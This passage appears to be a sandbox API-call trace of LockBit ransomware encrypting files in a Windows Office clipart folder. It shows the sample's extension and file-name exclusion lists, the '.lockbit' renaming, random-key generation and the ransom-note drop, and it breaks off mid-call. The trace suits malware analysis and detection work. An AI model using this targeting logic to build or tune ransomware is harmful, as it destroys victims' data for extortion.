lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0153.454] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0153.454] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0153.454] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0153.454] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.454] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0153.454] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0153.454] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0153.454] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0153.454] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0153.454] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0153.454] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0153.454] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0153.454] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0153.454] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0153.454] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0153.454] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0153.454] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0153.455] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0153.455] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0153.455] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0153.455] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0153.455] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.455] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0153.455] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0153.455] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0153.455] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0153.455] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0239191.WMF") returned 1 [0153.455] lstrcmpiW (lpString1="ntldr", lpString2="J0239191.WMF") returned 1 [0153.455] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0239191.WMF") returned 1 [0153.455] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0239191.WMF") returned -1 [0153.455] lstrcmpiW (lpString1="autorun.inf", lpString2="J0239191.WMF") returned -1 [0153.455] lstrcmpiW (lpString1="thumbs.db", lpString2="J0239191.WMF") returned 1 [0153.455] lstrcmpiW (lpString1="iconcache.db", lpString2="J0239191.WMF") returned -1 [0153.455] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0153.455] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239191.WMF") returned=".WMF" [0153.455] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0153.455] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0153.455] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0153.455] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0153.455] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0153.455] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0153.455] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0153.455] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0153.456] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0153.456] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0153.456] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0153.456] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0153.456] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0153.456] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0153.456] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0153.456] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0153.456] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0153.456] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0153.456] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0153.456] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0153.456] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0153.456] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0153.456] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0153.456] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0153.456] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0153.456] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0153.456] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0153.456] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0153.456] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239191.WMF.lockbit") returned 72 [0153.456] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239191.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0239191.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0153.458] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0153.458] malloc (_Size=0x40068) returned 0x3df0008 [0153.458] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=5220) returned 1 [0153.458] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.459] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.459] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0153.459] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.459] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.459] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0153.459] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0153.464] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239191.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239191.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0153.464] malloc (_Size=0xa6) returned 0x1fa2ed8 [0153.465] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0153.465] free (_Block=0x1fa2ed8) [0153.465] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239191.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0153.465] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0153.465] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0153.466] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5661b6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x8424, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0239611.WMF", cAlternateFileName="")) returned 1 [0153.466] lstrcmpiW (lpString1=".", lpString2="J0239611.WMF") returned -1 [0153.466] lstrcmpiW (lpString1="..", lpString2="J0239611.WMF") returned -1 [0153.466] PathFindExtensionW (pszPath="J0239611.WMF") returned=".WMF" [0153.466] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0153.466] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0153.466] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0153.466] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0153.466] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0153.466] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0153.466] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0153.466] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0153.466] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0153.466] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0153.466] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0153.466] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0153.466] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0153.466] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0153.466] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0153.466] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0153.466] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0153.466] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0153.467] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0153.467] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0153.467] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0153.467] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0153.467] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0153.467] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0153.467] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.467] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0153.467] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0153.467] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0153.467] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0153.467] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0153.467] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0153.467] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0153.467] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0153.467] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0153.467] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0153.467] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0153.467] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0153.467] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0153.467] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0153.467] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0153.467] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0153.467] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0153.468] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.468] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0153.468] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0153.468] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0153.468] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0153.468] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0239611.WMF") returned 1 [0153.468] lstrcmpiW (lpString1="ntldr", lpString2="J0239611.WMF") returned 1 [0153.468] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0239611.WMF") returned 1 [0153.468] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0239611.WMF") returned -1 [0153.468] lstrcmpiW (lpString1="autorun.inf", lpString2="J0239611.WMF") returned -1 [0153.468] lstrcmpiW (lpString1="thumbs.db", lpString2="J0239611.WMF") returned 1 [0153.468] lstrcmpiW (lpString1="iconcache.db", lpString2="J0239611.WMF") returned -1 [0153.468] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0153.468] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239611.WMF") returned=".WMF" [0153.468] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0153.468] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0153.468] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0153.468] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0153.468] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0153.468] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0153.468] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0153.468] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0153.468] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0153.468] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0153.469] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0153.469] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0153.469] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0153.469] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0153.469] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0153.469] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0153.469] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0153.469] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0153.469] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0153.469] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0153.469] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0153.469] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0153.469] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0153.469] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0153.469] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0153.469] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0153.469] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0153.469] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0153.469] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239611.WMF.lockbit") returned 72 [0153.469] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239611.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0239611.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0153.470] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0153.470] malloc (_Size=0x40068) returned 0x3df0008 [0153.471] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=33828) returned 1 [0153.471] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.471] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.471] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0153.471] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.472] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.472] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0153.472] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0153.476] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239611.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239611.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0153.476] malloc (_Size=0xa6) returned 0x1fa2ed8 [0153.476] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0153.479] free (_Block=0x1fa2ed8) [0153.479] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239611.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0153.479] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0153.479] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0153.479] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x660ca390, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1314, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0239935.WMF", cAlternateFileName="")) returned 1 [0153.479] lstrcmpiW (lpString1=".", lpString2="J0239935.WMF") returned -1 [0153.479] lstrcmpiW (lpString1="..", lpString2="J0239935.WMF") returned -1 [0153.479] PathFindExtensionW (pszPath="J0239935.WMF") returned=".WMF" [0153.479] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0153.479] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0153.479] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0153.480] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0153.480] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0153.480] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0153.480] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0153.480] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0153.480] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0153.480] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0153.480] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0153.480] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0153.480] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0153.480] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0153.480] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0153.480] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0153.480] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0153.480] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0153.480] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0153.480] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0153.480] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0153.480] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0153.480] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0153.480] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0153.480] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.480] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0153.481] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0153.481] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0153.481] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0153.481] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0153.481] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0153.481] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0153.481] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0153.481] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0153.481] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0153.481] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0153.481] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0153.481] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0153.481] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0153.481] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0153.481] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0153.481] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0153.481] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.481] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0153.481] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0153.481] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0153.481] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0153.481] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0239935.WMF") returned 1 [0153.481] lstrcmpiW (lpString1="ntldr", lpString2="J0239935.WMF") returned 1 [0153.481] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0239935.WMF") returned 1 [0153.482] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0239935.WMF") returned -1 [0153.482] lstrcmpiW (lpString1="autorun.inf", lpString2="J0239935.WMF") returned -1 [0153.482] lstrcmpiW (lpString1="thumbs.db", lpString2="J0239935.WMF") returned 1 [0153.482] lstrcmpiW (lpString1="iconcache.db", lpString2="J0239935.WMF") returned -1 [0153.482] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0153.482] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239935.WMF") returned=".WMF" [0153.482] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0153.482] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0153.482] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0153.482] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0153.482] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0153.482] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0153.482] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0153.482] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0153.482] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0153.482] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0153.482] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0153.482] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0153.482] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0153.482] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0153.482] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0153.482] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0153.483] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0153.483] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0153.483] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0153.483] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0153.483] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0153.483] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0153.483] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0153.483] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0153.483] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0153.483] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0153.483] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0153.483] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0153.483] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239935.WMF.lockbit") returned 72 [0153.483] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239935.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0239935.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0153.485] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0153.485] malloc (_Size=0x40068) returned 0x3df0008 [0153.485] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=4884) returned 1 [0153.486] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.486] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.486] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0153.486] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.487] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.487] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0153.487] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, 